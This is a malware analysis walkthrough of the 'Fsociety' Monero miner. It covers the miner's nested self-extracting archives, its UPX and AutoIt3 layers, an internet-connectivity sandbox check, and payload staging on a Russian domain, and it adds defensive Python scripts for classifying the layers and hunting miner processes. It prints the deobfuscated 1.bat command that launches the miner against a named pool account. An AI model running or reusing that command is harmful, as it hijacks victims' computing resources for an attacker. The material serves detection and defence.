Fsociety is a Monero (XMR) miner that uses multiple layers of wrapping to stay hidden. It stages its payloads on a Russian adult-themed domain and uses nested self-extracting archives plus a packer to avoid being caught by standard security tools.
Filename: fsociety_soft.exe
MD5: dfafd55bc9a0e84eafada04a5f21aead
Sample: Download via Malwr
Technical Analysis Walkthrough
Unpacking the Layers: "RAR-ception"
The infection starts with a self-extracting (SFX) RAR archive. The author nests these archives inside one another to confuse automated scanners.
- Layer 1: fsociety_soft.exe extracts WINDOWS.exe.
- Layer 2: That WINDOWS.exe is actually another SFX archive that extracts a second WINDOWS.exe.
- Layer 3: This final file is UPX-packed. Once you unpack it, you find an embedded AutoIt3 script.
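Because the layering is what defeats the scanners, the first triage step is to identify which wrapper you are looking at before peeling it. The script below is an added example (my code, not part of the original write-up): it reads the PE section table to spot the UPX section names, searches for the RAR 4/5 signature that an SFX stub carries after its PE image, and looks for the AU3! marker of a compiled AutoIt3 script. The LAYERS blobs are constructed stand-ins for the three layers, not the real samples; actual extraction still needs unrar/7-Zip and upx -d.

```python
import struct
from typing import List

# File-format markers for the wrappers seen in the three layers
RAR4_MAGIC = b"Rar!\x1a\x07\x00"            # RAR 4.x archive signature
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"        # RAR 5.x archive signature
UPX_SECTIONS = {b"UPX0", b"UPX1", b"UPX2"}  # section names left by a stock UPX build
AUTOIT_MARKER = b"AU3!"                     # marker that prefixes a compiled AutoIt3 script


def pe_section_names(data: bytes) -> List[bytes]:
    """Return the section names of a PE image, or [] if data is not a parseable PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_header_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_header_size  # section table follows the optional header
    names = []
    for i in range(num_sections):
        off = table + i * 40  # each IMAGE_SECTION_HEADER is 40 bytes, name first
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0"))
    return names


def classify_layer(data: bytes) -> List[str]:
    """Tag one file with the wrappers it carries: PE stub, (SFX) RAR, UPX, AutoIt3."""
    names = pe_section_names(data)
    tags = []
    if names:
        tags.append("pe")
    if RAR4_MAGIC in data or RAR5_MAGIC in data:
        # a RAR signature inside a PE means an SFX stub with the archive appended
        tags.append("sfx-rar" if names else "rar")
    if any(n in UPX_SECTIONS for n in names):
        tags.append("upx")
    if AUTOIT_MARKER in data:
        tags.append("autoit3")
    return tags


def build_fake_pe(section_names: List[bytes], trailer: bytes = b"") -> bytes:
    """Constructed test data: a minimal PE-shaped blob (headers only, not runnable)."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader (0 here), Characteristics
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0)
    sections = b"".join(n.ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos_header + coff + sections + trailer


# Constructed stand-ins for the layers of fsociety_soft.exe (not the real samples)
LAYERS = {
    "fsociety_soft.exe": build_fake_pe([b".text", b".rdata"], RAR4_MAGIC + b"\0" * 16),
    "WINDOWS.exe (1st)": build_fake_pe([b".text", b".rdata"], RAR4_MAGIC + b"\0" * 16),
    "WINDOWS.exe (2nd, packed)": build_fake_pe([b"UPX0", b"UPX1", b".rsrc"]),
    "WINDOWS.exe (2nd, unpacked)": build_fake_pe([b".text", b".rsrc"], AUTOIT_MARKER + b"\0" * 16),
}

if __name__ == "__main__":
    for name, blob in LAYERS.items():
        print(f"{name:28} {classify_layer(blob)}")
```

Run it on each file you peel out of the chain; when a layer reports sfx-rar, extract with unrar and classify the result, and when it reports upx, run upx -d first, because the AU3! marker is only visible in the unpacked image.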
Network Behavior and Anti-Analysis
When it runs, WINDOWS.exe makes a request to iplogger.com. This doubles as a sandbox check: if the connection fails, the malware assumes it is running in an isolated analysis environment and exits. The check is easy to defeat in the lab by giving the sample simulated internet access (a fake DNS/HTTP responder such as INetSim or FakeNet), which is worth doing before concluding the sample is inert.
If the connection works, it reaches out to porntovirt.ru to download the remaining components:
- Security.exe / system.exe: the actual mining software.
- 1.bat: the script that kicks everything off.
The Mining Payload: 1.bat
The 1.bat file is heavily obfuscated to hide its intent. Once deobfuscated, the command that launches the miner is:
C:\ProgramData\System32\system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 --donate-level=1 -u lemoh4uk.sagmail.com -p x -t 2 -k
The miner connects to the MinerGate pool at xmr.pool.minergate.com:45560 and mines Monero for the account lemoh4uk.sagmail.com (-u) with password x (-p), keep-alive enabled (-k) and a 1% built-in developer donation (--donate-level=1). Note that -t 2 sets two mining threads inside a single process, not two instances: on a dual-core machine that pins the CPU at 100%, but on a larger box the load sits at two cores, so a detection rule that only fires on total CPU near 100% can miss it.
How to Spot and Stop It
The final mining binaries are well known to antivirus engines, but the SFX wrappers often slip through.
- Block SFX RARs: There's rarely a reason to allow self-extracting archives in a professional environment.
- Watch for high CPU and odd paths: Miners are obvious if you look at performance. A System32 folder under C:\ProgramData is a red flag (the real one lives under C:\Windows), as is any executable launched from C:\ProgramData.
- Flag UPX: Unless your team uses UPX-packed tools, treat UPX-packed executables as suspicious by default.
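The miner command line from 1.bat and the path hint above can be turned into a small hunt over process-creation telemetry. The script below is an added example (my code, not from the original write-up): it parses an XMRig-style command line into pool, user, threads and flags, then scores each event on a stratum URL, a System32 folder outside the Windows directory, and the --donate-level switch. It assumes the switch set is XMRig's (the 1.bat command line matches it) and the three SAMPLE_EVENTS are constructed, modelled on Sysmon Event ID 1 fields, not real logs.

```python
import re
import shlex
from typing import Dict, List, Tuple

# stratum+tcp://host:port or stratum+ssl://host:port, as in the 1.bat command
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://([^:\s\"']+):(\d+)", re.IGNORECASE)
# The only legitimate System32 lives under the Windows directory
REAL_SYSTEM32_RE = re.compile(r"^[a-z]:\\windows\\system32\\", re.IGNORECASE)

# Switches that take a value. Assumption: XMRig's option names; extend for other forks.
VALUE_OPTS = {
    "-o": "pool", "--url": "pool",
    "-u": "user", "--user": "user",
    "-p": "password", "--pass": "password",
    "-t": "threads", "--threads": "threads",
    "--donate-level": "donate_level",
}


def parse_miner_cmdline(cmdline: str) -> Dict[str, object]:
    """Split a miner command line into image, named options and bare flags."""
    tokens = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes intact
    info: Dict[str, object] = {"image": tokens[0].strip('"') if tokens else "", "flags": set()}
    i = 1
    while i < len(tokens):
        key, _, inline_val = tokens[i].partition("=")  # handles --donate-level=1
        if key in VALUE_OPTS:
            if inline_val:
                info[VALUE_OPTS[key]] = inline_val
            elif i + 1 < len(tokens):
                info[VALUE_OPTS[key]] = tokens[i + 1]
                i += 1
        else:
            info["flags"].add(key)
        i += 1
    return info


def score_process_event(event: Dict[str, str]) -> List[str]:
    """Return the miner indicators matched by one process-creation event."""
    image = event.get("Image", "")
    cmdline = event.get("CommandLine", "")
    reasons: List[str] = []

    pool = STRATUM_RE.search(cmdline)
    if pool:
        reasons.append(f"stratum pool {pool.group(1)}:{pool.group(2)}")

    if "\\system32\\" in image.lower() and not REAL_SYSTEM32_RE.match(image):
        reasons.append("System32 folder outside the Windows directory")

    info = parse_miner_cmdline(cmdline) if cmdline else {"flags": set()}
    if pool and info.get("user"):
        reasons.append(f"pool login {info['user']} with {info.get('threads', '?')} thread(s)")
    if "donate_level" in info:
        reasons.append("--donate-level switch (miner developer-fee setting)")
    return reasons


# Constructed events modelled on Sysmon Event ID 1 (not real telemetry)
SAMPLE_EVENTS = [
    {"Image": r"C:\ProgramData\System32\system.exe",
     "CommandLine": r"C:\ProgramData\System32\system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 "
                    r"--donate-level=1 -u lemoh4uk.sagmail.com -p x -t 2 -k"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule"},
    {"Image": r"C:\Program Files\7-Zip\7z.exe",
     "CommandLine": r'"C:\Program Files\7-Zip\7z.exe" x backup.rar -oC:\ProgramData\restore'},
]


def hunt(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (image, reasons) for every event that matched at least one indicator."""
    hits = []
    for event in events:
        reasons = score_process_event(event)
        if reasons:
            hits.append((event["Image"], reasons))
    return hits


if __name__ == "__main__":
    for image, reasons in hunt(SAMPLE_EVENTS):
        print(image)
        for reason in reasons:
            print("   -", reason)
```

The svchost and 7-Zip events are there to show what must not fire: both use short switches (-k, -p, -o) that overlap with the miner's, so the hunt keys on the stratum URL and the fake System32 path rather than on flags alone. Feed it your real process-creation events as dicts with Image and CommandLine fields.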
Conclusion
Fsociety is a great example of how simple threats can stay hidden through sheer effort. By burying the miner under layers of AutoIt and nested archives, the attackers hope to stay on your system long enough to make a profit.
Happy hunting.